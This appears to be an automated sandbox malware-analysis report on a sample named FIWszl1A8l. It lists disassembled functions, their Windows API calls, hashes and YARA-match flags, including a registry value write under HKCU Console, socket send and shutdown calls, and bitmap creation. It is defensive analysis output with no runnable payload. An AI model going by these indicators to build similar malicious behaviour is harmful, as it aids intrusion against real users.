                                                                                                  • Instruction ID: 42fca0dd1741c7345b11d6f61d778ae793118cffcebb2e6741103cb710768137
                                                                                                  • Opcode Fuzzy Hash: 3396b14031d31d2122c26f53994c45e9dbabe40eb77878f3e61cbc7e8ef6dcb3
                                                                                                  • Instruction Fuzzy Hash: 8D016171940700EAE7609F65E90474AFBE1EF50314F20898DE4DA97B90CB74AD48CF25
                                                                                                  Function 009797E2 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00987C00,00000008,009798EA,00000000,00000000,?,00979FB0,00000000,00000001,00000000,?,0097C0CF,00000018,00987C70,0000000C), ref: 009797F3
                                                                                                  • __lock.LIBCMT ref: 00979827
                                                                                                    • Part of subcall function 0097C144: __mtinitlocknum.LIBCMT ref: 0097C15A
                                                                                                    • Part of subcall function 0097C144: __amsg_exit.LIBCMT ref: 0097C166
                                                                                                    • Part of subcall function 0097C144: EnterCriticalSection.KERNEL32(00000000,00000000,?,009799BA,0000000D,00987C28,00000008,00979AB1,00000000,?,00977711,00000000,00987B60,00000008,00977776,?), ref: 0097C16E
                                                                                                  • InterlockedIncrement.KERNEL32(?), ref: 00979834
                                                                                                  • __lock.LIBCMT ref: 00979848
                                                                                                  • ___addlocaleref.LIBCMT ref: 00979866
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                  • String ID: KERNEL32.DLL
                                                                                                  • API String ID: 637971194-2576044830
                                                                                                  • Opcode ID: b8df977d62eb303c084a96ab75a02417019909700f4a7f66d465bd33bbaadad6
                                                                                                  • Instruction ID: fafeeae7c7118a518a3bd4cc04e766f2bd9d63c339dc6979631f0a2fd439acbb
                                                                                                  • Opcode Fuzzy Hash: b8df977d62eb303c084a96ab75a02417019909700f4a7f66d465bd33bbaadad6
                                                                                                  • Instruction Fuzzy Hash: 930184B2405B00EFD720AF65D845749FBF0EF91324F14850EE4DA973A1CBB4A644CB15
                                                                                                  Function 02D0B78C Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 32registryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • RegOpenKeyExW.ADVAPI32(80000001,Console,00000000,00000002), ref: 02D0B7A7
                                                                                                  • RegDeleteValueW.ADVAPI32(?,IpDatespecial), ref: 02D0B7B7
                                                                                                  • RegSetValueExW.ADVAPI32(?,IpDatespecial,00000000,00000003,?,00000004), ref: 02D0B7CE
                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000004), ref: 02D0B7D9
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Value$CloseDeleteOpen
                                                                                                  • String ID: Console$IpDatespecial
                                                                                                  • API String ID: 3183427449-1840232981
                                                                                                  • Opcode ID: 05d62a97f57bd6d1fb2c1d8f3acf79e1af655e9c26e2353c288a8a566f02b2db
                                                                                                  • Instruction ID: 2411c78eb43c942e65693480f45814a5a178122a37822b55bd44b6732229693f
                                                                                                  • Opcode Fuzzy Hash: 05d62a97f57bd6d1fb2c1d8f3acf79e1af655e9c26e2353c288a8a566f02b2db
                                                                                                  • Instruction Fuzzy Hash: 4DF0A775784340FBF3384760BD4FF66B764F798705FA04A4DFB856528086A0A91CC655
                                                                                                  Function 02D202FC Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __getptd.LIBCMT ref: 02D2031D
                                                                                                    • Part of subcall function 02D13E5B: __getptd_noexit.LIBCMT ref: 02D13E5E
                                                                                                    • Part of subcall function 02D13E5B: __amsg_exit.LIBCMT ref: 02D13E6B
                                                                                                  • __getptd.LIBCMT ref: 02D2032E
                                                                                                  • __getptd.LIBCMT ref: 02D2033C
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                  • String ID: MOC$RCC$csm
                                                                                                  • API String ID: 803148776-2671469338
                                                                                                  • Opcode ID: a1f0d33c8d38bd48e94782b4de51ff7935ea793739f44933f6f473294c896614
                                                                                                  • Instruction ID: 00f9656766701615ff912ebf61e531beccd01da158fc80f69ce8c3f7c5a263e2
                                                                                                  • Opcode Fuzzy Hash: a1f0d33c8d38bd48e94782b4de51ff7935ea793739f44933f6f473294c896614
                                                                                                  • Instruction Fuzzy Hash: E4E01238504314DFCB209768D14AB6837E5EB64719F5505E1D44CCB721C738DC94CD52
                                                                                                  Function 009833F1 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __getptd.LIBCMT ref: 00983412
                                                                                                    • Part of subcall function 0097990F: __getptd_noexit.LIBCMT ref: 00979912
                                                                                                    • Part of subcall function 0097990F: __amsg_exit.LIBCMT ref: 0097991F
                                                                                                  • __getptd.LIBCMT ref: 00983423
                                                                                                  • __getptd.LIBCMT ref: 00983431
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                  • String ID: MOC$RCC$csm
                                                                                                  • API String ID: 803148776-2671469338
                                                                                                  • Opcode ID: 6cafc6eb67b1167ca934f12c74b901a19b36c58c2209ef507fb1707306695bdb
                                                                                                  • Instruction ID: 0d71437a906981ca1996715dd55b302117a411813dcadf5988750999b5a3f407
                                                                                                  • Opcode Fuzzy Hash: 6cafc6eb67b1167ca934f12c74b901a19b36c58c2209ef507fb1707306695bdb
                                                                                                  • Instruction Fuzzy Hash: 61E012315041088ED710A778C08AB6932E8FBC4714F5984A9E51DCB333D728DE508642
                                                                                                  Function 02D09C30 Relevance: 9.1, APIs: 6, Instructions: 108COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _malloc.LIBCMT ref: 02D09C3F
                                                                                                    • Part of subcall function 02D0F673: __FF_MSGBANNER.LIBCMT ref: 02D0F68C
                                                                                                    • Part of subcall function 02D0F673: __NMSG_WRITE.LIBCMT ref: 02D0F693
                                                                                                    • Part of subcall function 02D0F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,02D14500,00000000,00000001,00000000,?,02D18DE6,00000018,02D26448,0000000C,02D18E76), ref: 02D0F6B8
                                                                                                  • _free.LIBCMT ref: 02D09C63
                                                                                                  • _memset.LIBCMT ref: 02D09CBB
                                                                                                    • Part of subcall function 02D0A610: GetObjectW.GDI32(?,00000054,?), ref: 02D0A62E
                                                                                                  • CreateDIBSection.GDI32(00000000,00000008,00000000,00000000,00000000,00000000), ref: 02D09CD3
                                                                                                  • _free.LIBCMT ref: 02D09CE4
                                                                                                  • _free.LIBCMT ref: 02D09D23
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free$AllocateCreateHeapObjectSection_malloc_memset
                                                                                                  • String ID:
                                                                                                  • API String ID: 1756752955-0
                                                                                                  • Opcode ID: f3c3e870e5e2a03c944868ea92aeb26a6891fdac89498b1ba600bd8bf0326d23
                                                                                                  • Instruction ID: 5bcb02cb21799c98bfe47af411aeec778827c3dd10a28c2e4769132a306143db
                                                                                                  • Opcode Fuzzy Hash: f3c3e870e5e2a03c944868ea92aeb26a6891fdac89498b1ba600bd8bf0326d23
                                                                                                  • Instruction Fuzzy Hash: F331D6B2A00305ABE310DF65D8D0B9677E8FF48714F00853AD909C77A1E7B0E854CBA4
                                                                                                  Function 02D05080 Relevance: 9.1, APIs: 6, Instructions: 107networkCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • EnterCriticalSection.KERNEL32(000002FF), ref: 02D050CA
                                                                                                  • WSASetLastError.WS2_32(0000139F), ref: 02D050E2
                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,?,00000000,000000FF), ref: 02D050EC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection$EnterErrorLastLeave
                                                                                                  • String ID:
                                                                                                  • API String ID: 4082018349-0
                                                                                                  • Opcode ID: 2bc10adf9fef22cde17e098a943563c8af919ba6f2c6d551b5140092c959a4d1
                                                                                                  • Instruction ID: b2ed234e675612f36981330aa132c7c084d537c0fe0d62868b924052e0282539
                                                                                                  • Opcode Fuzzy Hash: 2bc10adf9fef22cde17e098a943563c8af919ba6f2c6d551b5140092c959a4d1
                                                                                                  • Instruction Fuzzy Hash: FD31CD72A44204ABD720CF94E989F6AB3A8FB48714F408A5EFD15C7790E736EC10CB61
                                                                                                  Function 00975060 Relevance: 9.1, APIs: 6, Instructions: 107networkCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • EnterCriticalSection.KERNEL32(000002FF), ref: 009750AA
                                                                                                  • WSASetLastError.WS2_32(0000139F), ref: 009750C2
                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,?,00000000,000000FF), ref: 009750CC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection$EnterErrorLastLeave
                                                                                                  • String ID:
                                                                                                  • API String ID: 4082018349-0
                                                                                                  • Opcode ID: bc6b0caa892a10a35dbb2a0c47462862e638405a6bacbfcf92b4c812b9f43676
                                                                                                  • Instruction ID: 1533b3243e946d8992309dc490f65c1f6bc21f0b5afa7278d8a2c12c6eb83d87
                                                                                                  • Opcode Fuzzy Hash: bc6b0caa892a10a35dbb2a0c47462862e638405a6bacbfcf92b4c812b9f43676
                                                                                                  • Instruction Fuzzy Hash: 38317076A08A44DBD710CF55ED86B6AB3E8FB88711F00851AF919C7781D776E800CB91
                                                                                                  Function 0097485A Relevance: 9.1, APIs: 6, Instructions: 91sleepsynchronizationCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,E484B528,?,?,?), ref: 009748E1
                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,E484B528,?,?,?), ref: 009748EC
                                                                                                  • Sleep.KERNEL32(00000258,?,E484B528,?,?,?), ref: 009748F9
                                                                                                  • CloseHandle.KERNEL32(?,?,E484B528,?,?,?), ref: 00974914
                                                                                                  • CloseHandle.KERNEL32(?,?,E484B528,?,?,?), ref: 0097491D
                                                                                                  • Sleep.KERNEL32(0000012C,?,E484B528,?,?,?), ref: 0097492E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseHandleObjectSingleSleepWait
                                                                                                  • String ID:
                                                                                                  • API String ID: 640476663-0
                                                                                                  • Opcode ID: e6cd326563fd8e9a74a1396add1adf4ab5a6178793c02a1fb8bc27f9fc72e961
                                                                                                  • Instruction ID: a3d0eee4099f8ea9b4ac51b2c08b5efa757edd9de1cbcd552d500690914efab8
                                                                                                  • Opcode Fuzzy Hash: e6cd326563fd8e9a74a1396add1adf4ab5a6178793c02a1fb8bc27f9fc72e961
                                                                                                  • Instruction Fuzzy Hash: 5C2137761086489BC710EFA8DD489C7F7F9FF89754B158B08E59887392C7349C09CBA1
                                                                                                  Function 02D205AE Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __CreateFrameInfo.LIBCMT ref: 02D205D6
                                                                                                    • Part of subcall function 02D200B7: __getptd.LIBCMT ref: 02D200C5
                                                                                                    • Part of subcall function 02D200B7: __getptd.LIBCMT ref: 02D200D3
                                                                                                  • __getptd.LIBCMT ref: 02D205E0
                                                                                                    • Part of subcall function 02D13E5B: __getptd_noexit.LIBCMT ref: 02D13E5E
                                                                                                    • Part of subcall function 02D13E5B: __amsg_exit.LIBCMT ref: 02D13E6B
                                                                                                  • __getptd.LIBCMT ref: 02D205EE
                                                                                                  • __getptd.LIBCMT ref: 02D205FC
                                                                                                  • __getptd.LIBCMT ref: 02D20607
                                                                                                  • _CallCatchBlock2.LIBCMT ref: 02D2062D
                                                                                                    • Part of subcall function 02D2015C: __CallSettingFrame@12.LIBCMT ref: 02D201A8
                                                                                                    • Part of subcall function 02D206D4: __getptd.LIBCMT ref: 02D206E3
                                                                                                    • Part of subcall function 02D206D4: __getptd.LIBCMT ref: 02D206F1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                  • String ID:
                                                                                                  • API String ID: 1602911419-0
                                                                                                  • Opcode ID: 6e1d7d08e8656124dfac85f8a1876976be5b585b28d7ef1ed5f7230407502b5a
                                                                                                  • Instruction ID: f4825ee50c5ea4f475c27b247282202656510170cd38c15a3d405fbc3f02bd7e
                                                                                                  • Opcode Fuzzy Hash: 6e1d7d08e8656124dfac85f8a1876976be5b585b28d7ef1ed5f7230407502b5a
                                                                                                  • Instruction Fuzzy Hash: 4711F9B1C00309EFDF00EFA4D444A9D7BB1FF14315F1081A9E855A7350DB3899159F60
                                                                                                  Function 009836A3 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __CreateFrameInfo.LIBCMT ref: 009836CB
                                                                                                    • Part of subcall function 0098325B: __getptd.LIBCMT ref: 00983269
                                                                                                    • Part of subcall function 0098325B: __getptd.LIBCMT ref: 00983277
                                                                                                  • __getptd.LIBCMT ref: 009836D5
                                                                                                    • Part of subcall function 0097990F: __getptd_noexit.LIBCMT ref: 00979912
                                                                                                    • Part of subcall function 0097990F: __amsg_exit.LIBCMT ref: 0097991F
                                                                                                  • __getptd.LIBCMT ref: 009836E3
                                                                                                  • __getptd.LIBCMT ref: 009836F1
                                                                                                  • __getptd.LIBCMT ref: 009836FC
                                                                                                  • _CallCatchBlock2.LIBCMT ref: 00983722
                                                                                                    • Part of subcall function 00983300: __CallSettingFrame@12.LIBCMT ref: 0098334C
                                                                                                    • Part of subcall function 009837C9: __getptd.LIBCMT ref: 009837D8
                                                                                                    • Part of subcall function 009837C9: __getptd.LIBCMT ref: 009837E6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                  • String ID:
                                                                                                  • API String ID: 1602911419-0
                                                                                                  • Opcode ID: 9eb8fbdff6370697fd3d774c20937fa029b557b4ad5e28059c5609ea49fbd8d8
                                                                                                  • Instruction ID: 13d14addafa90d0032f3a61d7b3a05e347c71888aa5c265a89f478065743c40c
                                                                                                  • Opcode Fuzzy Hash: 9eb8fbdff6370697fd3d774c20937fa029b557b4ad5e28059c5609ea49fbd8d8
                                                                                                  • Instruction Fuzzy Hash: E311D7B1C00209DFDB00EFA4D486BEE7BB1FF44314F108469F968A7251EB389A159F50
                                                                                                  Function 02D14885 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __getptd.LIBCMT ref: 02D14891
                                                                                                    • Part of subcall function 02D13E5B: __getptd_noexit.LIBCMT ref: 02D13E5E
                                                                                                    • Part of subcall function 02D13E5B: __amsg_exit.LIBCMT ref: 02D13E6B
                                                                                                  • __amsg_exit.LIBCMT ref: 02D148B1
                                                                                                  • __lock.LIBCMT ref: 02D148C1
                                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 02D148DE
                                                                                                  • _free.LIBCMT ref: 02D148F1
                                                                                                  • InterlockedIncrement.KERNEL32(032C1648), ref: 02D14909
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 3470314060-0
                                                                                                  • Opcode ID: 774c6439d22a8b84ec12526f716ccf2ef140f8b9db6799b72216c3bf3beedee2
                                                                                                  • Instruction ID: d2623227e43f48e2b3d09e7bbbd364ca58d1187730575049b12e86f1e90933df
                                                                                                  • Opcode Fuzzy Hash: 774c6439d22a8b84ec12526f716ccf2ef140f8b9db6799b72216c3bf3beedee2
                                                                                                  • Instruction Fuzzy Hash: D201A932D417E2BBEB20AB68B008799B3A1FF04B21F254405E854A7B80CB30AC55CFE1
                                                                                                  Function 0097D9BE Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __getptd.LIBCMT ref: 0097D9CA
                                                                                                    • Part of subcall function 0097990F: __getptd_noexit.LIBCMT ref: 00979912
                                                                                                    • Part of subcall function 0097990F: __amsg_exit.LIBCMT ref: 0097991F
                                                                                                  • __amsg_exit.LIBCMT ref: 0097D9EA
                                                                                                  • __lock.LIBCMT ref: 0097D9FA
                                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0097DA17
                                                                                                  • _free.LIBCMT ref: 0097DA2A
                                                                                                  • InterlockedIncrement.KERNEL32(027D1648), ref: 0097DA42
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 3470314060-0
                                                                                                  • Opcode ID: 8b8fba2d8462a9365bcc3682ed776ff08e18f9fc164d6493637d1715f8af427e
                                                                                                  • Instruction ID: 2450734b867a13a13c110d2af12d8c6a349ea2e1bd4c6b3f8bf879536c49543d
                                                                                                  • Opcode Fuzzy Hash: 8b8fba2d8462a9365bcc3682ed776ff08e18f9fc164d6493637d1715f8af427e
                                                                                                  • Instruction Fuzzy Hash: 1B01C03391BA219BC724AF68940676DB3B4BF40710F188119F81DB7380CB34A941DBD5
                                                                                                  Function 009748C7 Relevance: 9.0, APIs: 6, Instructions: 44sleepsynchronizationCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,E484B528,?,?,?), ref: 009748E1
                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,E484B528,?,?,?), ref: 009748EC
                                                                                                  • Sleep.KERNEL32(00000258,?,E484B528,?,?,?), ref: 009748F9
                                                                                                  • CloseHandle.KERNEL32(?,?,E484B528,?,?,?), ref: 00974914
                                                                                                  • CloseHandle.KERNEL32(?,?,E484B528,?,?,?), ref: 0097491D
                                                                                                  • Sleep.KERNEL32(0000012C,?,E484B528,?,?,?), ref: 0097492E
                                                                                                    • Part of subcall function 00973F60: GetCurrentThreadId.KERNEL32 ref: 00973F65
                                                                                                    • Part of subcall function 00973F60: send.WS2_32(?,00987440,00000010,00000000), ref: 00973FC6
                                                                                                    • Part of subcall function 00973F60: SetEvent.KERNEL32(?), ref: 00973FE9
                                                                                                    • Part of subcall function 00973F60: InterlockedExchange.KERNEL32(?,00000000), ref: 00973FF5
                                                                                                    • Part of subcall function 00973F60: WSACloseEvent.WS2_32(?), ref: 00974003
                                                                                                    • Part of subcall function 00973F60: shutdown.WS2_32(?,00000001), ref: 0097401B
                                                                                                    • Part of subcall function 00973F60: closesocket.WS2_32(?), ref: 00974025
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Close$EventHandleObjectSingleSleepWait$CurrentExchangeInterlockedThreadclosesocketsendshutdown
                                                                                                  • String ID:
                                                                                                  • API String ID: 1019945655-0
                                                                                                  • Opcode ID: 9d8722712c6eba4b0af73b6554568a8cd8c4268c02056c41e2cd1ab7d302dcd1
                                                                                                  • Instruction ID: 91767d40d874ba6aa43789f4456955e209aff0741d90bde10dbd23712f9782cf
                                                                                                  • Opcode Fuzzy Hash: 9d8722712c6eba4b0af73b6554568a8cd8c4268c02056c41e2cd1ab7d302dcd1
                                                                                                  • Instruction Fuzzy Hash: C6F036762046049BC614EB69DC84D8BF3E9EFC5720B158B09F26D97794CA74EC059BA0
                                                                                                  Function 02D09BA0 Relevance: 9.0, APIs: 6, Instructions: 42COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • DeleteObject.GDI32(?), ref: 02D09BD2
                                                                                                  • EnterCriticalSection.KERNEL32(02D2FB64,?,?,?,02D09B7B), ref: 02D09BE3
                                                                                                  • EnterCriticalSection.KERNEL32(02D2FB64,?,?,?,02D09B7B), ref: 02D09BF8
                                                                                                  • GdiplusShutdown.GDIPLUS(00000000,?,?,?,02D09B7B), ref: 02D09C04
                                                                                                  • LeaveCriticalSection.KERNEL32(02D2FB64,?,?,?,02D09B7B), ref: 02D09C15
                                                                                                  • LeaveCriticalSection.KERNEL32(02D2FB64,?,?,?,02D09B7B), ref: 02D09C1C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
